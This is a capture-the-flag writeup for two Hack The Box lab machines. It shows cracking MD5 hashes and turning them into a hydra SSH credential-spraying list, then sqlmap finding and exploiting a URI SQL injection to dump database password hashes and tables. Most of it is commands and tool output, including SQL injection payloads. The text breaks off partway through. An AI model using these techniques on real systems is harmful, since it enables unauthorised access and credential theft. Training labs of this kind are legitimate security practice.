71f08b45555acc5259bcefa3af63f4e1
8f61be2ebfc66a5f2496bbf849c89b84
2c22da161f085a9aba62b9bbedbd4ca7
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat users.json | jq -r 'to_entries | .[].value' > hashes
Once the hashes are saved to a file, we can run hashcat against them as raw MD5 (-m 0) with rockyou; 12 of them crack:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ hashcat -a 0 -m 0 hashes /usr/share/wordlists/rockyou.txt --force -o user-hashes
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ hashcat -m 0 hashes --show
eb95fc1ab8251cf1f8f870e7e4dae54d:megadeth
fc7992e8952a8ff5000cb7856d8586d2:Princess1
fe01ce2a7fbac8fafaed7c982a04e229:demo
2ac9cb7dc02b3c0083eb70898e549b63:Password1
254e5f2c3beb1a3d03f17253c15c07f3:hacktheplanet
c21f969b5f03d33d43e04f8f136e7682:default
9731e89f01c1fb943cf0baa6772d2875:piggy
0ef9c986fad340989647f0001e3555d4:misfits
5177790ad6df0ea98db41b37b602367c:strength
6f9ff93a26a118b460c878dc30e17130:monkeyman
1e0ad2ec7e8c3cc595a9ec2e3762b117:blaster
0daa6275280be3cf03f9f9c62f9d26d1:lovesucks1
So now we have a massive list of users and 12 passwords, with the hashes as the only link between the two:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat users.json | head -n10
{
"quinton_dach": "17906b445a05dc42f78ae86a92a57bbd",
"jackie.abbott": "c6ab361604c4691f78958d6289910d21",
"isidro": "e4a4c90483d2ef61de42af1f044087f3",
"roy": "afbde995441e19497fe0695e9c539266",
"colleen": "d3792794c3143f7e04fd57dc8b085cd4",
"harrison.hessel": "bc5f9b43a0336253ff947a4f8dbdb74f",
"asa.christiansen": "d7505316e9a10fc113126f808663b5a4",
"jessie": "71f08b45555acc5259bcefa3af63f4e1",
"milton_hintz": "8f61be2ebfc66a5f2496bbf849c89b84",
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat user-hashes
eb95fc1ab8251cf1f8f870e7e4dae54d:megadeth
fc7992e8952a8ff5000cb7856d8586d2:Princess1
fe01ce2a7fbac8fafaed7c982a04e229:demo
2ac9cb7dc02b3c0083eb70898e549b63:Password1
254e5f2c3beb1a3d03f17253c15c07f3:hacktheplanet
c21f969b5f03d33d43e04f8f136e7682:default
9731e89f01c1fb943cf0baa6772d2875:piggy
0ef9c986fad340989647f0001e3555d4:misfits
5177790ad6df0ea98db41b37b602367c:strength
6f9ff93a26a118b460c878dc30e17130:monkeyman
1e0ad2ec7e8c3cc595a9ec2e3762b117:blaster
0daa6275280be3cf03f9f9c62f9d26d1:lovesucks1
Since the hash is the one field these two files share, we use it to join them into a file of 'username:password' lines that hydra can take directly.
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat user-hashes| while read c; do hash=$(echo ${c} | cut -d: -f1); pass=$(echo $c |cut -d: -f2); username=$(grep ${hash} users.json | cut -d: -f1 ); echo "${username}:${pass}"; done
"wendell":megadeth
"genevieve":Princess1
"demo":demo
"admin":Password1
"d_murphy":hacktheplanet
"default":default
"abbigail":piggy
"aglae":misfits
"irma":strength
"ona":monkeyman
"alec":blaster
"rick":lovesucks1
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat user-hashes| while read c; do hash=$(echo ${c} | cut -d: -f1); pass=$(echo $c |cut -d: -f2); username=$(grep ${hash} users.json | cut -d: -f1 ); echo "${username}:${pass}"; done > user_pass
Then strip the " characters, since hydra doesn't want them (in vim: :%s/"//g then :wq):
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat user_pass
wendell:megadeth
genevieve:Princess1
demo:demo
admin:Password1
d_murphy:hacktheplanet
default:default
abbigail:piggy
aglae:misfits
irma:strength
ona:monkeyman
alec:blaster
rick:lovesucks1
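Instead of grepping each hash back out of users.json, the join can be done properly. The following is an added example (not the writeup's own code) run on constructed input: a few of the real hash/password pairs from above plus a made-up `backup_admin` that shares admin's hash, so one cracked hash yields two lines, a case the grep loop above handles awkwardly. It also recomputes the MD5 of each pair before it goes into the hydra list, so a stray potfile line cannot slip through.

```python
"""Join hashcat's cracked `hash:password` lines back onto users.json to get a
`user:password` list for hydra.  Added example, not the writeup's own code.
The inputs are constructed: real pairs from the page plus a made-up
`backup_admin` that shares admin's hash."""
import hashlib
import json

USERS_JSON = json.dumps({
    "genevieve": "fc7992e8952a8ff5000cb7856d8586d2",
    "demo": "fe01ce2a7fbac8fafaed7c982a04e229",
    "admin": "2ac9cb7dc02b3c0083eb70898e549b63",
    "default": "c21f969b5f03d33d43e04f8f136e7682",
    "quinton_dach": "17906b445a05dc42f78ae86a92a57bbd",  # never cracked
    "backup_admin": "2ac9cb7dc02b3c0083eb70898e549b63",  # constructed duplicate
})

# hashcat --show output; one hash deliberately upper-cased to show normalisation.
CRACKED = """\
fc7992e8952a8ff5000cb7856d8586d2:Princess1
fe01ce2a7fbac8fafaed7c982a04e229:demo
2AC9CB7DC02B3C0083EB70898E549B63:Password1
c21f969b5f03d33d43e04f8f136e7682:default
"""


def parse_cracked(text):
    """Map lower-cased hash -> password, splitting on the first ':' only so
    passwords that themselves contain a colon survive."""
    cracked = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        h, _, pw = line.partition(":")
        cracked[h.strip().lower()] = pw
    return cracked


def join_credentials(users_json, cracked_text):
    """Return [(user, password), ...] in users.json order; users whose hash
    was not cracked are skipped, users sharing a hash each get an entry."""
    cracked = parse_cracked(cracked_text)
    pairs = []
    for user, h in json.loads(users_json).items():
        pw = cracked.get(h.lower())
        if pw is not None:
            pairs.append((user, pw))
    return pairs


def verify_pairs(users_json, pairs):
    """Recompute MD5 for every pair; returns {user: True/False}."""
    users = json.loads(users_json)
    return {u: hashlib.md5(pw.encode()).hexdigest() == users[u].lower()
            for u, pw in pairs}


def hydra_lines(pairs):
    """Format for `hydra -C <file>`: one `user:password` per line."""
    return "".join(f"{u}:{pw}\n" for u, pw in pairs)


if __name__ == "__main__":
    pairs = join_credentials(USERS_JSON, CRACKED)
    assert all(verify_pairs(USERS_JSON, pairs).values())
    print(hydra_lines(pairs), end="")
```

Point `USERS_JSON` at the real users.json and `CRACKED` at the `hashcat --show` output and the printed lines are the user_pass file above, quotes already gone.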
[ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
→ hydra -C user_pass ssh://10.10.10.86
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (http://www.thc.org/thc-hydra) starting at 2020-01-16 14:16:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries, ~1 try per task
[DATA] attacking ssh://10.10.10.86:22/
[22][ssh] host: 10.10.10.86 login: genevieve password: Princess1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-01-16 14:16:00
And we found valid credentials, genevieve:Princess1, so let's log in via ssh:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ ssh genevieve@10.10.10.86
The authenticity of host '10.10.10.86 (10.10.10.86)' can't be established.
ECDSA key fingerprint is SHA256:3gHAJvc1zomI4M6+oCp/3xrMyS6DMPbMFEGDbBO2Qso.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.86' (ECDSA) to the list of known hosts.
genevieve@10.10.10.86's password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-133-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Mar 26 23:42:41 2018 from 172.23.10.99
genevieve@dab:~$ id
uid=1000(genevieve) gid=1000(genevieve) groups=1000(genevieve)
genevieve@dab:~$ cat user.txt
9bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! we managed to find the user flag.
## **Part 3 : Getting Root Access**
Now let's enumerate this box from genevieve's point of view; to do so we'll use the linPEAS script:
genevieve@dab:~$ which wget ; which curl
/usr/bin/wget
/usr/bin/curl
Both curl and wget are present on the box, so we can pull our script over easily, typically into /tmp or /dev/shm.
[ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
→ wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
--2021-01-16 14:29:02-- https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.64.133, 151.101.0.133, 151.101.192.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.64.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 319969 (312K) [text/plain]
Saving to: linpeas.sh
linpeas.sh 100%[============================================================================================>] 312.47K --.-KB/s in 0.09s
2021-01-16 14:29:02 (3.36 MB/s) - linpeas.sh saved [319969/319969]
[ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
genevieve@dab:/dev/shm$ wget http://10.10.14.16:9090/linpeas.sh
--2021-01-16 08:30:02-- http://10.10.14.16:9090/linpeas.sh
Connecting to 10.10.14.16:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 319969 (312K) [text/x-sh]
Saving to: linpeas.sh
linpeas.sh 100%[============================================================================================>] 312.47K 715KB/s in 0.4s
2021-01-16 08:30:02 (715 KB/s) - linpeas.sh saved [319969/319969]
genevieve@dab:/dev/shm$ chmod +x linpeas.sh
genevieve@dab:/dev/shm$ ./linpeas.sh
![](prg/12/20.png)
Let it run, then go through the interesting findings. The most important one is that /sbin/ldconfig has the setuid bit set, so it runs as root:
![](prg/12/21.png)
[ 10.10.14.16/23 ] [ /dev/pts/5 ] [~]
→ man ldconfig
DESCRIPTION
ldconfig creates the necessary links and cache to the most recent shared libraries found in the directories specified on the command line, in the file
/etc/ld.so.conf, and in the trusted directories, /lib and /usr/lib (on some 64-bit architectures such as x86-64, /lib and /usr/lib are the trusted directories for
32-bit libraries, while /lib64 and /usr/lib64 are used for 64-bit libraries).
The cache is used by the run-time linker, ld.so or ld-linux.so. ldconfig checks the header and filenames of the libraries it encounters when determining which versions should have their links updated.
ldconfig will attempt to deduce the type of ELF libraries (i.e., libc5 or libc6/glibc) based on what C libraries, if any, the library was linked against.
The second binary we need is located in /usr/bin/myexec:
![](prg/12/22.png)
## **Conclusion**
Here we can see the progress graph :

Hard/13.md
# Oz Writeup
![](img/13.png)
## Introduction :
Oz is a hard linux box released back in September 2018.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.96 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 8080/tcp on 10.10.10.96
Discovered open port 80/tcp on 10.10.10.96
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~]
→ nmap -sCV -p 80,8080 10.10.10.96
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-17 11:52 CET
Nmap scan report for 10.10.10.96
Host is up (0.041s latency).
PORT STATE SERVICE VERSION
80/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.14)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.14
|_http-title: OZ webapi
|_http-trane-info: Problem with XML parsing of /evox/about
8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.14)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-title: GBR Support - Login
|_Requested resource was http://10.10.10.96:8080/login
|_http-trane-info: Problem with XML parsing of /evox/about
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.99 seconds
## **Part 2 : Getting User Access**
The nmap scan points us at ports 80 and 8080, so let's try to enumerate them:
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.96
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.96
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/01/17 11:55:43 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.96/194ad667-6357-4e67-8b9f-601382c8bc49 => 200. To force processing of Wildcard responses, specify the '--wildcard' switch
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.96:8080
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.96:8080
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/01/17 11:55:47 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.96:8080/d87af5e8-6226-494c-9eeb-8fd9699648b3 => 200. To force processing of Wildcard responses, specify the '--wildcard' switch
Every path returns a 200, so directory busting won't help here; let's look at the pages manually:
![](prg/13/2.png)
Port 8080 gives us a login page; there doesn't seem to be any SQL injection in it, and we can't dirbust it either.
![](prg/13/1.png)
Port 80 gives us a web API asking for a username.
![](prg/13/3.png)
As we give different usernames we get different responses, so let's continue from curl:
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96
OZ webapi
### Please register a username!
%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing
Please register a username!%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing2
GSBG0D4LRACK1065VFTSOVAP5C7PCG3TB49PFCF7MEQ6IIR0IO7M4PEMXD36ML42NTDAH4ZSALOZW9OWXT6RJ85I3XE49RA6JDT537SIGV82U5F9DR5X8SAB9WI637PGN4UBZ2K7WTBTSBQGR6Z2ZKWH39MJSFEP3AMSM2XTE9VJPTM9LSNUV7ZPPNWOJBV743Q6NMR5WNHSQ4J6O19E5S0KTFMSUUQO6OA5X2U0GZK0W0P%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing3
Please register a username!%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing4
DF03OPTMZ596RUG97CSR8KE2ZEP31YP95VEESEDAIT2ZFFVLLG71Q1%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing5
Please register a username!%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing6
KQAISB6RL5L8VGSR4JWJHE35HA77FUF1L9A1WHD8F1PNEM5MTADE0PZZ42HAIRI6H57U5CBRZGLBPD25G3EP547BMBL3RE7QWFML3879YX2FE20HRU7U5Y40WIWEXQS1H1OYYP62AW86PA6ORH9XFBTC8E6H16TNPBYVDO%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing7
38NQLZG275I1W7SJW67SPMDMR9MXIDWOSZVA6M1R990A0VQXYXVZAPOB07QF0RX9E92HZ2S3XLOV7ST0O6F4TH2710WPCOVX7TXLSUQSYNQMYIUG1W0QIZKYE8MHWCU6HI2OKPSKGXFTQG9QRAI0S4SB5X82UUGSI4N18XEQP4NIBBACYVODBYCGI15NP3AYBVNJMXRN3YN3P7BD8CPLJCY8W8KKVEPVT51BKETON14BTO4M19S2%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing8
M8KAGOFMGES8MS9TS3V53ZWRHCFFAA8YVL0MZ86JRJNMJJP9JOGXV3SNUSHKJ4GG0HD7DCN1Y5X43DDE2GB5DA7WV6MWKJO4HGSP5U8WCJ9XWGJVH2B7XL8XKGVUC0FWCZPO1WTQFK49Q3DJG23VPMXEC4NFZ8435VAXDVPDBGFK3DDQFL1V3DWFWSBWTSDQRP943%
We can use wfuzz to enumerate the responses from port 80, hiding (--hw) the replies that contain exactly 1 word (the random token) or 4 words ("Please register a username!"):
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ wfuzz -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt --hw 1,4 10.10.10.96/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.96/FUZZ
Total requests: 87664
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 3 L 6 W 75 Ch "# directory-list-2.3-small.txt"
000000003: 200 3 L 6 W 75 Ch "# Copyright 2007 James Fisher"
000000007: 200 3 L 6 W 75 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000014: 200 3 L 6 W 75 Ch "http://10.10.10.96/"
000000006: 200 3 L 6 W 75 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000011: 200 3 L 6 W 75 Ch "# Priority ordered case sensative list, where entries were found"
000000005: 200 3 L 6 W 75 Ch "# This work is licensed under the Creative Commons"
000000013: 200 3 L 6 W 75 Ch "#"
000000010: 200 3 L 6 W 75 Ch "#"
000000008: 200 3 L 6 W 75 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000009: 200 3 L 6 W 75 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000012: 200 3 L 6 W 75 Ch "# on atleast 3 different hosts"
000000002: 200 3 L 6 W 75 Ch "#"
000000004: 200 3 L 6 W 75 Ch "#"
000000202: 200 3 L 6 W 79 Ch "users"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
Total time: 0
Processed Requests: 975
Filtered Requests: 960
Requests/sec.: 0
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ curl 10.10.10.96/users
OZ webapi
### Please register a username!
%
Here /users returns the "OZ webapi" page with the register message as a heading, like the root page, rather than the plain one-liner the random paths return, so this endpoint really exists. Let's look closer:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ curl 10.10.10.96/users -v
* Trying 10.10.10.96:80...
* Connected to 10.10.10.96 (10.10.10.96) port 80 (#0)
> GET /users HTTP/1.1
> Host: 10.10.10.96
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-Type: text/html; charset=utf-8
< Content-Length: 79
< Server: Werkzeug/0.14.1 Python/2.7.14
< Date: Thu, 21 Jan 2021 13:44:46 GMT
<
OZ webapi
### Please register a username!
* Closing connection 0
%
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ curl 10.10.10.96/users/ -v
* Trying 10.10.10.96:80...
* Connected to 10.10.10.96 (10.10.10.96) port 80 (#0)
> GET /users/ HTTP/1.1
> Host: 10.10.10.96
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-Type: text/html; charset=utf-8
< Content-Length: 89
< Server: Werkzeug/0.14.1 Python/2.7.14
< Date: Thu, 21 Jan 2021 13:44:49 GMT
<
OZ webapi
### Please register a username!
* Closing connection 0
%
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ curl 10.10.10.96/users/"'" -v
* Trying 10.10.10.96:80...
* Connected to 10.10.10.96 (10.10.10.96) port 80 (#0)
> GET /users/' HTTP/1.1
> Host: 10.10.10.96
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 500 INTERNAL SERVER ERROR
< Content-Type: text/html
< Content-Length: 291
< Server: Werkzeug/0.14.1 Python/2.7.14
< Date: Thu, 21 Jan 2021 13:44:53 GMT
<
500 Internal Server Error
# Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
* Closing connection 0
After poking at that URL we see something odd: appending ' to the path returns a 500 Internal Server Error. That smells like SQL injection, so let's verify it:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ sqlmap -u http://10.10.10.96/users/ --batch
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:42:40 /2021-01-21/
[14:42:40] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[14:42:40] [INFO] testing connection to the target URL
[14:42:40] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:42:40] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n] Y
[14:42:40] [WARNING] please consider usage of tamper scripts (option '--tamper')
[14:42:40] [INFO] testing if the target URL content is stable
[14:42:41] [INFO] target URL content is stable
[14:42:41] [INFO] testing if URI parameter '#1*' is dynamic
[14:42:41] [INFO] URI parameter '#1*' appears to be dynamic
[14:42:41] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[14:42:41] [INFO] testing for SQL injection on URI parameter '#1*'
[14:42:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:42:42] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:42:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:42:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:42:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[14:42:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:42:45] [INFO] testing 'Generic inline queries'
[14:42:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[14:42:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[14:42:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[14:42:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:42:58] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[14:42:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:42:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:43:01] [INFO] target URL appears to be UNION injectable with 1 columns
[14:43:01] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://10.10.10.96:80/users/' AND (SELECT 5564 FROM (SELECT(SLEEP(5)))XXXV) AND 'JCgZ'='JCgZ
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: http://10.10.10.96:80/users/' UNION ALL SELECT CONCAT(0x716b6a6a71,0x4c53726344695a75686c4c714a766e4e56545a5a4b4c61655457764361447776536a684645747a54,0x716a767071)-- -
---
[14:43:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[14:43:01] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 40 times
[14:43:01] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
[*] ending @ 14:43:01 /2021-01-21/
And here we see that the URL parameter is vulnerable, so let's enumerate it further to get the databases available:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ sqlmap -u http://10.10.10.96/users/ --dbs --batch
available databases [4]:
[*] information_schema
[*] mysql
[*] ozdb
[*] performance_schema
[14:44:45] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[14:44:45] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
[*] ending @ 14:44:45 /2021-01-21/
Now let's enumerate further and see if we can find password hashes:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ sqlmap -u http://10.10.10.96/users/ --passwords --batch
---
[14:45:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[14:45:17] [INFO] fetching database users password hashes
[14:45:18] [INFO] retrieved: 'root',''
[14:45:18] [INFO] retrieved: 'dorthi',''
[14:45:18] [INFO] retrieved: 'root',''
[14:45:18] [INFO] retrieved: 'root','*61A2BD98DAD2A09749B6FC77A9578609D32518DD'
[14:45:18] [INFO] retrieved: 'dorthi','*43AE542A63D9C43FF9D40D0280CFDA58F6C747CA'
[14:45:18] [INFO] retrieved: 'root','*61A2BD98DAD2A09749B6FC77A9578609D32518DD'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:45:19] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:45:19] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:45:19] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:45:19] [INFO] starting 3 processes
[14:45:31] [WARNING] no clear password(s) found
database management system users password hashes:
[*] dorthi [1]:
password hash: *43AE542A63D9C43FF9D40D0280CFDA58F6C747CA
[*] root [1]:
password hash: *61A2BD98DAD2A09749B6FC77A9578609D32518DD
[14:45:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[14:45:31] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
[*] ending @ 14:45:31 /2021-01-21/
Now let's see if we can get the contents of the ozdb database:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ sqlmap -u http://10.10.10.96/users/ -D ozdb --batch --dump
___
Table: users_gbw
[6 entries]
+----+----------------------------------------------------------------------------------------+-------------+
| id | password | username |
+----+----------------------------------------------------------------------------------------+-------------+
| 1 | $pbkdf2-sha256$5000$aA3h3LvXOseYk3IupVQKgQ$ogPU/XoFb.nzdCGDulkW3AeDZPbK580zeTxJnG0EJ78 | dorthi |
| 2 | $pbkdf2-sha256$5000$GgNACCFkDOE8B4AwZgzBuA$IXewCMHWhf7ktju5Sw.W.ZWMyHYAJ5mpvWialENXofk | tin.man |
| 3 | $pbkdf2-sha256$5000$BCDkXKuVMgaAEMJ4z5mzdg$GNn4Ti/hUyMgoyI7GKGJWeqlZg28RIqSqspvKQq6LWY | wizard.oz |
| 4 | $pbkdf2-sha256$5000$bU2JsVYqpbT2PqcUQmjN.Q$hO7DfQLTL6Nq2MeKei39Jn0ddmqly3uBxO/tbBuw4DY | coward.lyon |
| 5 | $pbkdf2-sha256$5000$Zax17l1Lac25V6oVwnjPWQ$oTYQQVsuSz9kmFggpAWB0yrKsMdPjvfob9NfBq4Wtkg | toto |
| 6 | $pbkdf2-sha256$5000$d47xHsP4P6eUUgoh5BzjfA$jWgyYmxDK.slJYUTsv9V9xZ3WWwcl9EBOsz.bARwGBQ | admin |
+----+----------------------------------------------------------------------------------------+-------------+
[14:47:36] [INFO] retrieved: 'db information loaded to ticket application for shared db access','12','GBR-9872'
Database: ozdb
Table: tickets_gbw
[12 entries]
+----+----------+--------------------------------------------------------------------------------------------------------------------------------+
| id | name | desc |
+----+----------+--------------------------------------------------------------------------------------------------------------------------------+
| 1 | GBR-987 | Reissued new id_rsa and id_rsa.pub keys for ssh access to dorthi. |
| 2 | GBR-1204 | Where did all these damn monkey's come from!? I need to call pest control. |
| 3 | GBR-1205 | Note to self: Toto keeps chewing on the curtain, find one with dog repellent. |
| 4 | GBR-1389 | Nothing to see here... V2hhdCBkaWQgeW91IGV4cGVjdD8= |
| 5 | GBR-4034 | Think of a better secret knock for the front door. Doesn't seem that secure, a Lion got in today. |
